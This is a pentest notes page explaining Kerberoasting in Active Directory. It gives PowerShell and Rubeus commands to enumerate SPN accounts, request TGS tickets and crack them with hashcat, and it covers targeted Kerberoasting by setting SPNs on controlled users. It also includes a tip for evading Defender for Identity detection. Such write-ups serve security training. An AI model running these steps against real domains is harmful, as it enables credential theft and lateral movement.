HackNotes

Appearance

Kerberoasting ​

In an Active Directory environment, every service that requires Kerberos authentication registers a Service Principal Name (SPN). This allows clients to request tickets for that service. When a client requests access to a service, it receives a Ticket Granting Service (TGS) ticket, which is encrypted using the service account's password hash.

This mechanismcan can be exploited by:

  1. Identifying service accounts with registered SPNs.

  2. Requesting a TGS ticket for the identified service using any compromised user account.

  3. Cracking the TGS ticket offline to recover the service account's password.

Since service account passwords are rarely changed, Kerberoasting has become a widely used attack technique.

Identify service accounts with registered SPNs ​

powershell
Get-DomainUser –SPN
powershell
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Request a TGS ticket ​

Use the tool Rubeus to request a TGS ticket for the identified service account.

bash
Rubeus.exe kerberoast /user:serviceaccount

Kerberoast all possible accounts

bash
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt

Security tools like Microsoft Defender for Identity (MDI) can detect Kerberos encryption downgrade attacks, where an attacker forces Kerberos to use weaker encryption (for example RC4-HMAC, identified as 0x17). To evade such detections, attackers can target Kerberoastable accounts that natively support only RC4-HMAC, eliminating the need for an explicit downgrade.

bash
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:serviceaccount /simple /rc4opsec

Cracking the TGS ticket ​

The ticket can then be cracked using a tool like hashcat:

bash
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

Targeted Kerberoasting ​

When you have GenericAll privileges over a user account, one obvious option is to reset the user’s password. However, obtaining the original password hash can be more valuable, especially for lateral movement. This is where Targeted Kerberoasting comes into play. Additionally it avoids disrupting the user’s access by not resetting their password.

With GenericAll or GenericWrite permissions, you can modify the servicePrincipalNames (SPN) attribute of the target user. The SPN can be set to any unique value within the domain. Once the SPN is updated, you can request a Ticket Granting Service (TGS) ticket for that user using the newly assigned SPN. Since the TGS ticket is encrypted with the user’s password hash, it becomes vulnerable to Kerberoasting.

Check if the target user already has an SPN assigned:

powershell
Get-DomainUser -Identity <username> | select serviceprincipalname
powershell
Get-ADUser -Identity <username> -Properties ServicePrincipalName | select ServicePrincipalName

If the target user has no SPN set, you can set one yourself:

powershell
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='sqlservice/db.example.comr'}
powershell
Set-ADUser -Identity support1user -ServicePrincipalNames @{Add='sqlservice/db.example.comr'}

With the SPN set, request a TGS ticket for the target user using a tool like Rubeus. The /outfile flag allows you to save the ticket's encrypted hash to a file.

powershell
Rubeus.exe kerberoast /outfile:targetedhashes.txt /user:<username>

Finally, the TGS ticket can be cracked to recover the password.